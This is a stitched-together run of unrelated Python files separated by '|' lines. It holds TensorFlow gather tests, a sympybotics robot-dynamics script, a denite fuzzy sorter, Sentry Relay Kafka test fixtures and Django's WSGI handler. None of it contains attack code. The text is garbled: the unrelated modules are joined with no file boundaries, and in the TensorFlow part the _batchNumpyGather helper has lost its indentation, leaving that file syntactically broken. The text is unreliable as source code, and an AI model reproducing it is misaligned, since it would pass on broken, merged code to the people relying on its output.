      # batch_dims=0 (equivalent to tf.gather)
      dict( # 2D indices
          batch_dims=0,
          params=[6, 7, 8, 9],
          indices=[[2, 1], [0, 3]],
          expected=[[8, 7], [6, 9]]),
      dict( # 3D indices
          batch_dims=0,
          params=[6, 7, 8, 9],
          indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
          expected=[[[9, 7], [8, 6]], [[6, 9], [8, 8]]]),
      dict( # 4D indices
          batch_dims=0,
          params=[8, 9],
          indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
                   [[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
          expected=[[[[8, 9], [9, 8]], [[8, 8], [9, 9]]],
                    [[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
      # batch_dims=indices.shape.ndims - 1
      # (equivalent to tf.compat.v1.batch_gather)
      dict( # 2D indices (1 batch dim)
          batch_dims=1,
          params=[[10, 11, 12, 13], [20, 21, 22, 23]],
          indices=[[2, 1], [0, 3]],
          expected=[[12, 11], [20, 23]]),
      dict( # 3D indices (2 batch dims)
          batch_dims=2,
          params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
          indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
          expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
      dict( # 2D indices (1 batch dim)
          batch_dims=-1,
          params=[[10, 11, 12, 13], [20, 21, 22, 23]],
          indices=[[2, 1], [0, 3]],
          expected=[[12, 11], [20, 23]]),
      dict( # 3D indices (2 batch dims)
          batch_dims=-1,
          params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
          indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
          expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
      # 0 < batch_dims < indices.shape.ndims - 1
      dict( # 3D indices (1 batch dim)
          batch_dims=1,
          params=[[10, 11, 12, 13], [20, 21, 22, 23]],
          indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
          expected=[[[13, 11], [12, 10]], [[20, 23], [22, 22]]]),
      dict( # 4D indices (1 batch dim)
          batch_dims=1,
          params=[[6, 7], [8, 9]],
          indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
                   [[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
          expected=[[[[6, 7], [7, 6]], [[6, 6], [7, 7]]],
                    [[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
      dict( # 4D indices (2 batch dims)
          batch_dims=2,
          params=[[[2, 3], [4, 5]], [[6, 7], [8, 9]]],
          indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
                   [[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
          expected=[[[[2, 3], [3, 2]], [[4, 4], [5, 5]]],
                    [[[7, 7], [6, 6]], [[8, 9], [9, 8]]]]),
      # axis > 0
      dict( # 3D indices, batch_dims=1, axis=2
          # params.shape  = [I1, J1, J2] = [2, 2, 3]
          # indices.shape = [I1, K1, K2] = [2, 1, 5]
          # result.shape  = [I1, J1, K1, K2] = [2, 2, 1, 5]
          batch_dims=1,
          axis=2,
          params=[[[10, 11, 12], [13, 14, 15]], [[20, 21, 22], [23, 24, 25]]],
          indices=[[[0, 1, 2, 1, 0]], [[0, 1, 2, 1, 0]]],
          expected=[[[[10, 11, 12, 11, 10]], [[13, 14, 15, 14, 13]]],
                    [[[20, 21, 22, 21, 20]], [[23, 24, 25, 24, 23]]]]),
      dict( # 3D indices, batch_dims=None, axis=1
          batch_dims=None,
          axis=1,
          params=[[10, 11, 12], [13, 14, 15]],
          indices=[1, 0],
          expected=[[11, 10], [14, 13]]),
  ])
  @test_util.run_in_graph_and_eager_modes
  def testBatchDims(self, params, indices, batch_dims, expected=None,
                    axis=None):
    """Checks gather with batch_dims against precomputed expected values."""
    result = array_ops.gather(params, indices, axis=axis, batch_dims=batch_dims)
    self.assertAllEqual(expected, result)
    # Repeat with the forward-compatibility window active, so both the old
    # and the new op paths are exercised.
    with compat.forward_compatibility_horizon(2019, 8, 11):
      result = array_ops.gather(
          params, indices, axis=axis, batch_dims=batch_dims)
      self.assertAllEqual(expected, result)
  @parameterized.parameters([
      dict(
          params_shape=[2, 3, 4, 5, 6, 7],
          indices_shape=[2, 3, 8, 9, 10],
          batch_dims=2,
          axis=2,
          output_shape=[2, 3, 8, 9, 10, 5, 6, 7]
          # = params.shape[:2] + indices.shape[2:] + params.shape[3:]
      ),
      dict(
          params_shape=[2, 3, 4, 5, 6, 7],
          indices_shape=[2, 3, 8, 9, 10],
          batch_dims=2,
          axis=3,
          output_shape=[2, 3, 4, 8, 9, 10, 6, 7]
          # = params.shape[:3] + indices.shape[2:] + params.shape[4:]
      ),
      dict(
          params_shape=[2, 3, 4, 5, 6, 7],
          indices_shape=[2, 3, 8, 9, 10],
          batch_dims=2,
          axis=4,
          output_shape=[2, 3, 4, 5, 8, 9, 10, 7]
          # = params.shape[:4] + indices.shape[2:] + params.shape[5:]
      ),
      dict(
          params_shape=[2, 3, 4, 5, 6, 7],
          indices_shape=[2, 3, 8, 9, 10],
          batch_dims=2,
          axis=5,
          output_shape=[2, 3, 4, 5, 6, 8, 9, 10]
          # = params.shape[:5] + indices.shape[2:] + params.shape[6:]
      ),
      dict(
          params_shape=[2, 3, 4, 5, 6, 7],
          indices_shape=[2, 3, 8, 9, 10],
          batch_dims=2,
          axis=-4,
          output_shape=[2, 3, 8, 9, 10, 5, 6, 7]
          # = params.shape[:2] + indices.shape[2:] + params.shape[3:]
      ),
      dict(
          params_shape=[2, 3, 4, 5, 6, 7],
          indices_shape=[2, 3, 8, 9, 10],
          batch_dims=2,
          axis=-3,
          output_shape=[2, 3, 4, 8, 9, 10, 6, 7]
          # = params.shape[:3] + indices.shape[2:] + params.shape[4:]
      ),
      dict(
          params_shape=[2, 3, 4, 5, 6, 7],
          indices_shape=[2, 3, 8, 9, 10],
          batch_dims=2,
          axis=-2,
          output_shape=[2, 3, 4, 5, 8, 9, 10, 7]
          # = params.shape[:4] + indices.shape[2:] + params.shape[5:]
      ),
      dict(
          params_shape=[2, 3, 4, 5, 6, 7],
          indices_shape=[2, 3, 8, 9, 10],
          batch_dims=2,
          axis=-1,
          output_shape=[2, 3, 4, 5, 6, 8, 9, 10]
          # = params.shape[:5] + indices.shape[2:] + params.shape[6:]
      ),
  ])
  @test_util.run_in_graph_and_eager_modes
  def testBatchDimsMatchesPythonBatching(self, params_shape, indices_shape,
                                         batch_dims, axis, output_shape):
    """Checks that batch_dims matches multiple calls to tf.gather().

    Args:
      params_shape: Shape for the generated `params` tensor.
      indices_shape: Shape for the generated `indices` tensor.
      batch_dims: Number of leading dimensions shared by both tensors.
      axis: The axis in `params` to gather along.
      output_shape: Expected static shape of the gather result.
    """
    # Generate a `params` tensor with the indicated shape.
    params_size = np.prod(params_shape)
    params = np.reshape(np.arange(params_size), params_shape)
    # Generate an `indices` tensor with the indicated shape, where each index
    # is within the appropriate range.
    indices_size = np.prod(indices_shape)
    indices = np.reshape(np.arange(indices_size), indices_shape)
    indices = indices % params_shape[axis]
    # Perform repeated (batched) gather operations with numpy, to find the
    # expected result.
    expected = self._batchNumpyGather(params, indices, axis, batch_dims)
    # On Windows, we get an exception if we pass in the transformed numpy
    # arrays ("Failed to convert numpy ndarray to a Tensor (Unsupported
    # feed type)."); so convert them back to lists before calling tf.gather.
    params = params.tolist()
    indices = indices.tolist()
    result = array_ops.gather(params, indices, axis=axis, batch_dims=batch_dims)
    self.assertAllEqual(output_shape, result.shape.as_list())
    self.assertAllEqual(expected, result)
    # Repeat with the forward-compatibility window active.
    with compat.forward_compatibility_horizon(2019, 8, 11):
      result = array_ops.gather(
          params, indices, axis=axis, batch_dims=batch_dims)
      self.assertAllEqual(output_shape, result.shape.as_list())
      self.assertAllEqual(expected, result)
def _batchNumpyGather(self, params, indices, axis, batch_dims):
"""Performs a batch gather by making recursive calls to np.take().
This is used by testBatchDims() to construct the expected value.
Args:
params: A numpy array
indices: A numpy array
axis: An integer
batch_dims: An integer
Returns:
A numpy array
"""
if batch_dims == 0:
return np.take(params, indices, axis=axis)
self.assertEqual(params.shape[0], indices.shape[0])
if axis > 0:
axis -= 1
return np.stack([
self._batchNumpyGather(params[i], indices[i], axis, batch_dims - 1)
for i in range(params.shape[0])
])
  @test_util.run_v1_only("RefVariable is not supported in v2")
  def testGatherRefVariable(self):
    """Gathering rows directly from a RefVariable uses the GatherV2 op."""
    with self.cached_session():
      v = variables.RefVariable(constant_op.constant([[1, 2], [3, 4], [5, 6]]))
      self.evaluate(variables.global_variables_initializer())
      gather = array_ops.gather(v, [0, 2])
      if not context.executing_eagerly():  # .op doesn't make sense in Eager
        self.assertEqual("GatherV2", gather.op.name)
      self.assertAllEqual([[1, 2], [5, 6]], gather)
  @test_util.run_in_graph_and_eager_modes
  def testGatherResourceVariable(self):
    """Gathering rows from a ResourceVariable routes through ResourceGather."""
    with self.cached_session():
      v = resource_variable_ops.ResourceVariable(
          constant_op.constant([[1, 2], [3, 4], [5, 6]]))
      self.evaluate(variables.global_variables_initializer())
      gather = array_ops.gather(v, [0, 2])
      if not context.executing_eagerly():  # .op doesn't make sense in Eager
        self.assertEqual("ResourceGather", gather.op.inputs[0].op.type)
      self.assertAllEqual([[1, 2], [5, 6]], gather)
# Run the full test suite when the file is executed directly.
if __name__ == "__main__":
  test.main()
|
import sympy
import numpy
import sympybotics

# Define the robot model from its (modified) Denavit-Hartenberg parameters.
rbtdef = sympybotics.RobotDef(
    'Example Robot',            # robot name
    [('0', 0, 0.29, 'q'),       # (alpha, a, d, theta) for each joint
     ('pi/2', 0, 0, 'q'),
     ('0', 0.32, 0, 'q'),
     ('-pi/2', 0, 0.42, 'q'),
     ('pi/2', 0, 0, 'q'),
     ('-pi/2', 0, 0.18, 'q')],
    dh_convention='modified'    # either 'standard' or 'modified'
)

# Gravity acceleration vector (along the negative z axis).
rbtdef.gravityacc = sympy.Matrix([0.0, 0.0, -9.81])

# Friction model: Coulomb plus viscous friction.
rbtdef.frictionmodel = {'Coulomb', 'viscous'}

# Show the full set of dynamic parameters.
print(rbtdef.dynparms())

# Build the robot dynamics model.
rbt = sympybotics.RobotDynCode(rbtdef, verbose=True)

# Generate C code for the inverse dynamics (joint torques) and show it.
tau_str = sympybotics.robotcodegen.robot_code_to_func(
    'C', rbt.invdyn_code, 'tau_out', 'tau', rbtdef)
print(tau_str)

# Compute the base (minimal) inertial parameter set and the regressor
# (observation) matrix, then generate C code for the regressor.
rbt.calc_base_parms()
print(rbt.dyn.baseparms)  # minimal parameter set P
print(rbt.Hb_code)        # regressor (observation) matrix code
Yr = sympybotics.robotcodegen.robot_code_to_func(
    'C', rbt.Hb_code, 'H', 'Hb_code', rbtdef)
print(Yr)

# Save the full dynamic parameters, torque model, regressor and minimal
# parameter set to a text file.  A raw string is used for the path: the
# original "D:\data.txt" relied on the invalid escape sequence "\d"
# (a DeprecationWarning today, a SyntaxError in future Python versions).
# The context manager guarantees the file is closed even on error.
with open(r"D:\data.txt", 'w+') as data:
    print(rbt.dyn.dynparms, tau_str, Yr, rbt.dyn.baseparms, file=data)
|
from functools import partial
from multiprocessing import cpu_count, Pool
from unicodedata import category
from denite.filter.sorter_sublime import get_score
from .base import Base
class Filter(Base):
    """Denite sorter ranking candidates with a Sublime-like fuzzy score.

    Scoring work is fanned out over a multiprocessing pool so large
    candidate lists do not block the editor.
    """

    def __init__(self, vim):
        super().__init__(vim)
        self.name = 'sorter_sublime_multiprocess'
        self.description = \
            'sorter for fuzzy matching like sublime text based on lib_fts using multiprocessing'
        # One worker fewer than the CPU count, leaving a core for the editor.
        self.pool = Pool(processes=cpu_count() - 1)
    def filter(self, context):
        # No input pattern: keep the candidates in their original order.
        if len(context['input']) == 0:
            return context['candidates']
        # Score chunks of candidates in parallel, then flatten the results.
        all_chunks = chunks(context['candidates'], cpu_count() - 1)
        all_chunks = self.pool.map(partial(score, context['input']), all_chunks)
        context['candidates'] = []
        for c in all_chunks:
            context['candidates'] += c
        # Highest score first.
        return sorted(
            context['candidates'],
            key=lambda candidate: -candidate['filter__rank']
        )
def score(pattern, candidates):
    """Attach a ``filter__rank`` fuzzy score to each candidate, in place.

    Module-level so it stays picklable for the multiprocessing pool.
    """
    for candidate in candidates:
        candidate['filter__rank'] = get_score(pattern, candidate['word'])
    return candidates
def chunks(l, n):
    """Yield consecutive slices of *l*, each at most *n* items long (n >= 1)."""
    n = max(1, n)
    for start in range(0, len(l), n):
        yield l[start:start + n]
|
import json
import msgpack
import uuid
import pytest
import os
import confluent_kafka as kafka
from copy import deepcopy
import json
@pytest.fixture
def get_topic_name():
    """
    Generate a unique topic name for each test
    """
    suffix = uuid.uuid4().hex

    def name(topic):
        return f"relay-test-{topic}-{suffix}"

    return name
@pytest.fixture
def processing_config(get_topic_name):
    """
    Returns a minimal configuration for setting up a relay capable of processing

    :param options: initial options to be merged
    :return: the altered options
    """

    def inner(options=None):
        # The CI script sets the kafka bootstrap server into system environment variable.
        bootstrap_servers = os.environ.get("KAFKA_BOOTSTRAP_SERVER", "127.0.0.1:9092")
        options = deepcopy(options)  # avoid lateral effects
        if options is None:
            options = {}
        if options.get("processing") is None:
            options["processing"] = {}
        processing = options["processing"]
        processing["enabled"] = True
        # Only fill in defaults the caller did not provide explicitly.
        if processing.get("kafka_config") is None:
            processing["kafka_config"] = [
                {"name": "bootstrap.servers", "value": bootstrap_servers},
                # {'name': 'batch.size', 'value': '0'} # do not batch messages
            ]
        if processing.get("topics") is None:
            # Point every ingestion topic at a per-test unique name.
            processing["topics"] = {
                "events": get_topic_name("events"),
                "attachments": get_topic_name("attachments"),
                "transactions": get_topic_name("transactions"),
                "outcomes": get_topic_name("outcomes"),
                "sessions": get_topic_name("sessions"),
                "metrics": get_topic_name("metrics"),
            }
        if not processing.get("redis"):
            processing["redis"] = "redis://127.0.0.1"
        # Unique prefix so parallel test runs do not share cached configs.
        processing[
            "projectconfig_cache_prefix"
        ] = f"relay-test-relayconfig-{uuid.uuid4()}"
        return options

    return inner
@pytest.fixture
def relay_with_processing(relay, mini_sentry, processing_config):
    """
    Creates a fixture that configures a relay with processing enabled and that forwards
    requests to the test ingestion topics
    """

    def inner(options=None):
        return relay(mini_sentry, options=processing_config(options))

    return inner
def kafka_producer(options):
    """Build a Kafka producer from the bootstrap servers in *options*."""
    # The bootstrap servers are the only piece of config we care about here.
    server = next(
        (
            entry["value"]
            for entry in options["processing"]["kafka_config"]
            if entry["name"] == "bootstrap.servers"
        ),
        None,
    )
    if server is None:
        raise ValueError(
            "Bad kafka_config, could not find 'bootstrap.servers'.\n"
            "The configuration should have an entry of the format \n"
            "{name:'bootstrap.servers', value:'127.0.0.1'} at path 'processing.kafka_config'"
        )
    return kafka.Producer({"bootstrap.servers": server})
@pytest.fixture
def kafka_consumer(request, get_topic_name, processing_config):
    """
    Creates a fixture that, when called, returns an already subscribed kafka consumer.
    """

    def inner(topic: str, options=None):
        topic_name = get_topic_name(topic)
        topics = [topic_name]
        options = processing_config(options)
        # look for the servers (it is the only config we are interested in)
        servers = [
            elm["value"]
            for elm in options["processing"]["kafka_config"]
            if elm["name"] == "bootstrap.servers"
        ]
        if len(servers) < 1:
            raise ValueError(
                "Bad kafka_config, could not find 'bootstrap.servers'.\n"
                "The configuration should have an entry of the format \n"
                "{name:'bootstrap.servers', value:'127.0.0.1'} at path 'processing.kafka_config'"
            )
        servers = servers[0]
        # Fresh group id per consumer, reading from the earliest offset so no
        # message produced before subscription is missed.
        settings = {
            "bootstrap.servers": servers,
            "group.id": "test-consumer-%s" % uuid.uuid4().hex,
            "enable.auto.commit": True,
            "auto.offset.reset": "earliest",
        }
        consumer = kafka.Consumer(settings)
        consumer.assign([kafka.TopicPartition(t, 0) for t in topics])

        # Make sure the consumer is closed when the test ends.
        def die():
            consumer.close()

        request.addfinalizer(die)
        return consumer, options, topic_name

    return inner
class ConsumerBase(object):
    """Base class for topic consumers used in tests.

    Pairs the subscribed consumer with a producer on the same topic so
    tests can positively verify that a topic is empty (see assert_empty).
    """

    def __init__(self, consumer, options, topic_name, timeout=None):
        self.consumer = consumer
        # Producer used to push sentinel messages onto the same topic.
        self.test_producer = kafka_producer(options)
        self.topic_name = topic_name
        self.timeout = timeout or 1

        # Connect to the topic and poll a first test message.
        # First poll takes forever, the next ones are fast.
        self.assert_empty(timeout=5)

    def poll(self, timeout=None):
        # Fall back to the instance-wide default timeout.
        if timeout is None:
            timeout = self.timeout
        return self.consumer.poll(timeout=timeout)

    def assert_empty(self, timeout=None):
        """
        An associated producer, that can send message on the same topic as the
        consumer used for tests when we don't expect anything to come back we
        can send a test message at the end and verify that it is the first and
        only message on the queue (care must be taken to make sure that the
        test message ends up in the same partition as the message we are checking).
        """
        # First, give Relay a bit of time to process
        assert self.poll(timeout=0.2) is None
        # Then, send a custom message to ensure we're not just timing out
        message = json.dumps({"__test__": uuid.uuid4().hex}).encode("utf8")
        self.test_producer.produce(self.topic_name, message)
        self.test_producer.flush(timeout=5)
        rv = self.poll(timeout=timeout)
        assert rv.error() is None
        assert rv.value() == message, rv.value()
@pytest.fixture
def outcomes_consumer(kafka_consumer):
    """Factory fixture producing a subscribed OutcomesConsumer."""

    def make(timeout=None, topic=None):
        consumer_args = kafka_consumer(topic or "outcomes")
        return OutcomesConsumer(*consumer_args, timeout=timeout)

    return make
def category_value(category):
    """Map an outcome data-category name to its numeric wire value.

    :param category: one of the known category names ("default", "error",
        "transaction", "security", "attachment", "session")
    :return: the integer value used on the wire
    :raises AssertionError: for an unknown category name

    The original if/elif chain ended in a bare ``assert False``, which is
    stripped under ``python -O`` and would silently return ``None``.  The
    explicit raise keeps the failure visible in optimized mode while
    preserving the exception type.
    """
    values = {
        "default": 0,
        "error": 1,
        "transaction": 2,
        "security": 3,
        "attachment": 4,
        "session": 5,
    }
    try:
        return values[category]
    except KeyError:
        raise AssertionError("invalid category: %r" % (category,))
class OutcomesConsumer(ConsumerBase):
    """Consumer for the outcomes topic with assertion helpers."""

    def _poll_all(self):
        # Yield messages until the topic is drained.
        while True:
            outcome = self.poll()
            if outcome is None:
                return
            else:
                yield outcome

    def get_outcomes(self):
        # Drain the topic and decode every outcome payload as JSON.
        outcomes = list(self._poll_all())
        for outcome in outcomes:
            assert outcome.error() is None
        return [json.loads(outcome.value()) for outcome in outcomes]

    def get_outcome(self):
        # Expect exactly one outcome on the topic.
        outcomes = self.get_outcomes()
        assert len(outcomes) > 0, "No outcomes were consumed"
        assert len(outcomes) == 1, "More than one outcome was consumed"
        return outcomes[0]

    def assert_rate_limited(self, reason, key_id=None, categories=None):
        # With explicit categories, compare the full set of outcome
        # categories; otherwise expect exactly one outcome.
        if categories is None:
            outcome = self.get_outcome()
            assert isinstance(outcome["category"], int)
            outcomes = [outcome]
        else:
            outcomes = self.get_outcomes()
            expected = set(category_value(category) for category in categories)
            actual = set(outcome["category"] for outcome in outcomes)
            assert actual == expected, (actual, expected)
        for outcome in outcomes:
            # outcome value 2 is what this helper treats as "rate limited".
            assert outcome["outcome"] == 2, outcome
            assert outcome["reason"] == reason, outcome["reason"]
            if key_id is not None:
                assert outcome["key_id"] == key_id

    def assert_dropped_internal(self):
        outcome = self.get_outcome()
        assert outcome["outcome"] == 3
        assert outcome["reason"] == "internal"

    def assert_dropped_unknown_project(self):
        outcome = self.get_outcome()
        assert outcome["outcome"] == 3
        assert outcome["reason"] == "project_id"
@pytest.fixture
def events_consumer(kafka_consumer):
    """Factory fixture producing a subscribed EventsConsumer."""

    def make(timeout=None):
        return EventsConsumer(*kafka_consumer("events"), timeout=timeout)

    return make
@pytest.fixture
def transactions_consumer(kafka_consumer):
    """Factory fixture for an EventsConsumer on the transactions topic."""

    def make():
        return EventsConsumer(*kafka_consumer("transactions"))

    return make
@pytest.fixture
def attachments_consumer(kafka_consumer):
    """Factory fixture for an AttachmentsConsumer on the attachments topic."""

    def make():
        return AttachmentsConsumer(*kafka_consumer("attachments"))

    return make
@pytest.fixture
def sessions_consumer(kafka_consumer):
    """Factory fixture for a SessionsConsumer on the sessions topic."""

    def make():
        return SessionsConsumer(*kafka_consumer("sessions"))

    return make
@pytest.fixture
def metrics_consumer(kafka_consumer):
    """Factory fixture for a MetricsConsumer.

    The default timeout of 3 seconds compensates for delays and jitter.
    """

    def make(timeout=3):
        return MetricsConsumer(*kafka_consumer("metrics"), timeout=timeout)

    return make
class MetricsConsumer(ConsumerBase):
    """Consumer for the metrics topic; payloads are JSON."""

    def get_metric(self, timeout=None):
        message = self.poll(timeout=timeout)
        assert message is not None
        assert message.error() is None
        return json.loads(message.value())
class SessionsConsumer(ConsumerBase):
    """Consumer for the sessions topic; payloads are JSON."""

    def get_session(self):
        message = self.poll()
        assert message is not None
        assert message.error() is None
        return json.loads(message.value())
class EventsConsumer(ConsumerBase):
    """Consumer for the events topic; messages are msgpack envelopes whose
    "payload" field contains the JSON-encoded event."""

    def get_event(self):
        message = self.poll()
        assert message is not None
        assert message.error() is None

        # The envelope must be of type "event"; return the decoded payload
        # together with the raw envelope.
        event = msgpack.unpackb(message.value(), raw=False, use_list=False)
        assert event["type"] == "event"
        return json.loads(event["payload"].decode("utf8")), event

    def get_message(self):
        message = self.poll()
        assert message is not None
        assert message.error() is None

        return message, msgpack.unpackb(message.value(), raw=False, use_list=False)
class AttachmentsConsumer(EventsConsumer):
    """Consumer for the attachments topic, which carries both attachment
    chunks and standalone attachment envelopes (msgpack-encoded)."""

    def get_attachment_chunk(self):
        message = self.poll()
        assert message is not None
        assert message.error() is None

        v = msgpack.unpackb(message.value(), raw=False, use_list=False)
        assert v["type"] == "attachment_chunk", v["type"]
        return v["payload"], v

    def get_individual_attachment(self):
        message = self.poll()
        assert message is not None
        assert message.error() is None

        v = msgpack.unpackb(message.value(), raw=False, use_list=False)
        assert v["type"] == "attachment", v["type"]
        return v
|
from __future__ import unicode_literals
import cgi
import codecs
import logging
import sys
from io import BytesIO
from threading import Lock
import warnings
from django import http
from django.conf import settings
from django.core import signals
from django.core.handlers import base
from django.core.urlresolvers import set_script_prefix
from django.utils import datastructures
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils.encoding import force_str, force_text
from django.utils.functional import cached_property
from django.utils import six
# For backwards compatibility -- lots of code uses this in the wild!
from django.http.response import REASON_PHRASES as STATUS_CODE_TEXT # NOQA
# Module-level logger for request handling errors.
logger = logging.getLogger('django.request')

# encode() and decode() expect the charset to be a native string.
ISO_8859_1, UTF_8 = str('iso-8859-1'), str('utf-8')
class LimitedStream(object):
    '''
    LimitedStream wraps another stream in order to not allow reading from it
    past specified amount of bytes.
    '''
    def __init__(self, stream, limit, buf_size=64 * 1024 * 1024):
        self.stream = stream
        self.remaining = limit
        self.buffer = b''
        self.buf_size = buf_size

    def _read_limited(self, size=None):
        # Clamp the request to the number of bytes still allowed.
        if size is None or size > self.remaining:
            size = self.remaining
        if not size:
            return b''
        data = self.stream.read(size)
        self.remaining -= len(data)
        return data

    def read(self, size=None):
        if size is None:
            # Drain the buffer plus everything still allowed on the stream.
            data, self.buffer = self.buffer + self._read_limited(), b''
            return data
        if size < len(self.buffer):
            # The buffer alone satisfies the request.
            data, self.buffer = self.buffer[:size], self.buffer[size:]
            return data
        # size >= len(self.buffer): take the whole buffer, top up from the
        # stream for the rest.
        data = self.buffer + self._read_limited(size - len(self.buffer))
        self.buffer = b''
        return data

    def readline(self, size=None):
        # Accumulate into the buffer until it contains a newline (or the
        # size cap / stream limit is reached).
        while b'\n' not in self.buffer and \
                (size is None or len(self.buffer) < size):
            wanted = size - len(self.buffer) if size else None
            piece = self._read_limited(wanted)
            if not piece:
                break
            self.buffer += piece
        # Split one line off the front of the buffer; keep the remainder.
        reader = BytesIO(self.buffer)
        line = reader.readline(size) if size else reader.readline()
        self.buffer = reader.read()
        return line
class WSGIRequest(http.HttpRequest):
    """HttpRequest implementation that reads everything from a WSGI environ."""

    def __init__(self, environ):
        script_name = get_script_name(environ)
        path_info = get_path_info(environ)
        if not path_info:
            # Sometimes PATH_INFO exists, but is empty (e.g. accessing
            # the SCRIPT_NAME URL without a trailing slash). We really need to
            # operate as if they'd requested '/'. Not amazingly nice to force
            # the path like this, but should be harmless.
            path_info = '/'
        self.environ = environ
        self.path_info = path_info
        # be careful to only replace the first slash in the path because of
        # http://test/something and http://test//something being different as
        # stated in http://www.ietf.org/rfc/rfc2396.txt
        self.path = '%s/%s' % (script_name.rstrip('/'),
                               path_info.replace('/', '', 1))
        self.META = environ
        self.META['PATH_INFO'] = path_info
        self.META['SCRIPT_NAME'] = script_name
        self.method = environ['REQUEST_METHOD'].upper()
        # Adopt the charset from the Content-Type header only when Python
        # actually knows the codec.
        _, content_params = cgi.parse_header(environ.get('CONTENT_TYPE', ''))
        if 'charset' in content_params:
            try:
                codecs.lookup(content_params['charset'])
            except LookupError:
                pass
            else:
                self.encoding = content_params['charset']
        self._post_parse_error = False
        # A missing or malformed CONTENT_LENGTH is treated as an empty body.
        try:
            content_length = int(environ.get('CONTENT_LENGTH'))
        except (ValueError, TypeError):
            content_length = 0
        self._stream = LimitedStream(self.environ['wsgi.input'], content_length)
        self._read_started = False
        self.resolver_match = None

    def _get_scheme(self):
        return self.environ.get('wsgi.url_scheme')

    def _get_request(self):
        # Deprecated combined GET/POST dict, kept for backwards compatibility.
        warnings.warn('`request.REQUEST` is deprecated, use `request.GET` or '
                      '`request.POST` instead.', RemovedInDjango19Warning, 2)
        if not hasattr(self, '_request'):
            self._request = datastructures.MergeDict(self.POST, self.GET)
        return self._request

    @cached_property
    def GET(self):
        # The WSGI spec says 'QUERY_STRING' may be absent.
        raw_query_string = get_bytes_from_wsgi(self.environ, 'QUERY_STRING', '')
        return http.QueryDict(raw_query_string, encoding=self._encoding)

    def _get_post(self):
        # Parse the body lazily, on first access.
        if not hasattr(self, '_post'):
            self._load_post_and_files()
        return self._post

    def _set_post(self, post):
        self._post = post

    @cached_property
    def COOKIES(self):
        raw_cookie = get_str_from_wsgi(self.environ, 'HTTP_COOKIE', '')
        return http.parse_cookie(raw_cookie)

    def _get_files(self):
        if not hasattr(self, '_files'):
            self._load_post_and_files()
        return self._files

    POST = property(_get_post, _set_post)
    FILES = property(_get_files)
    REQUEST = property(_get_request)
class WSGIHandler(base.BaseHandler):
    """WSGI application callable that dispatches requests through Django."""
    initLock = Lock()
    request_class = WSGIRequest

    def __call__(self, environ, start_response):
        # Set up middleware if needed. We couldn't do this earlier, because
        # settings weren't available.
        if self._request_middleware is None:
            with self.initLock:
                try:
                    # Check that middleware is still uninitialized.
                    if self._request_middleware is None:
                        self.load_middleware()
                except:
                    # Unload whatever middleware we got
                    # (bare except is deliberate: reset the partially-loaded
                    # state for *any* failure, then re-raise unchanged).
                    self._request_middleware = None
                    raise

        set_script_prefix(get_script_name(environ))
        signals.request_started.send(sender=self.__class__, environ=environ)
        try:
            request = self.request_class(environ)
        except UnicodeDecodeError:
            # Undecodable request data: answer 400 instead of crashing.
            logger.warning('Bad Request (UnicodeDecodeError)',
                exc_info=sys.exc_info(),
                extra={
                    'status_code': 400,
                }
            )
            response = http.HttpResponseBadRequest()
        else:
            response = self.get_response(request)

        response._handler_class = self.__class__

        status = '%s %s' % (response.status_code, response.reason_phrase)
        response_headers = [(str(k), str(v)) for k, v in response.items()]
        for c in response.cookies.values():
            response_headers.append((str('Set-Cookie'), str(c.output(header=''))))
        start_response(force_str(status), response_headers)
        return response
def get_path_info(environ):
    """
    Returns the HTTP request's PATH_INFO as a unicode string.
    """
    # It'd be better to implement URI-to-IRI decoding, see #19508.
    return get_bytes_from_wsgi(environ, 'PATH_INFO', '/').decode(UTF_8)
def get_script_name(environ):
    """
    Returns the equivalent of the HTTP request's SCRIPT_NAME environment
    variable. If Apache mod_rewrite has been used, returns what would have been
    the script name prior to any rewriting (so it's the script name as seen
    from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
    set (to anything).
    """
    if settings.FORCE_SCRIPT_NAME is not None:
        return force_text(settings.FORCE_SCRIPT_NAME)

    # If Apache's mod_rewrite had a whack at the URL, Apache set either
    # SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any
    # rewrites. Unfortunately not every Web server (lighttpd!) passes this
    # information through all the time, so FORCE_SCRIPT_NAME, above, is still
    # needed.
    script_url = get_bytes_from_wsgi(environ, 'SCRIPT_URL', '')
    if not script_url:
        script_url = get_bytes_from_wsgi(environ, 'REDIRECT_URL', '')

    if script_url:
        # Strip the trailing PATH_INFO portion to recover the script name.
        path_info = get_bytes_from_wsgi(environ, 'PATH_INFO', '')
        script_name = script_url[:-len(path_info)]
    else:
        script_name = get_bytes_from_wsgi(environ, 'SCRIPT_NAME', '')

    # It'd be better to implement URI-to-IRI decoding, see #19508.
    return script_name.decode(UTF_8)
def get_bytes_from_wsgi(environ, key, default):
    """
    Get a value from the WSGI environ dictionary as bytes.

    key and default should be str objects. Under Python 2 they may also be
    unicode objects provided they only contain ASCII characters.
    """
    value = environ.get(str(key), str(default))
    if six.PY2:
        return value
    # Under Python 3, non-ASCII values in the WSGI environ are arbitrarily
    # decoded with ISO-8859-1. This is wrong for Django websites where UTF-8
    # is the default. Re-encode to recover the original bytestring.
    return value.encode(ISO_8859_1)
def get_str_from_wsgi(environ, key, default):
    """
    Get a value from the WSGI environ dictionary as text (native str).

    key and default should be str objects. Under Python 2 they may also be
    unicode objects provided they only contain ASCII characters.
    """
    value = environ.get(str(key), str(default))
    if six.PY2:
        return value
    # Same ISO-8859-1 round-trip as get_bytes_from_wsgi, then decode back to
    # text as UTF-8, replacing any undecodable bytes.
    return value.encode(ISO_8859_1).decode(UTF_8, errors='replace')
|
from MultipleAccumulate import MultipleAccumulate
from TextViewer import TextViewer
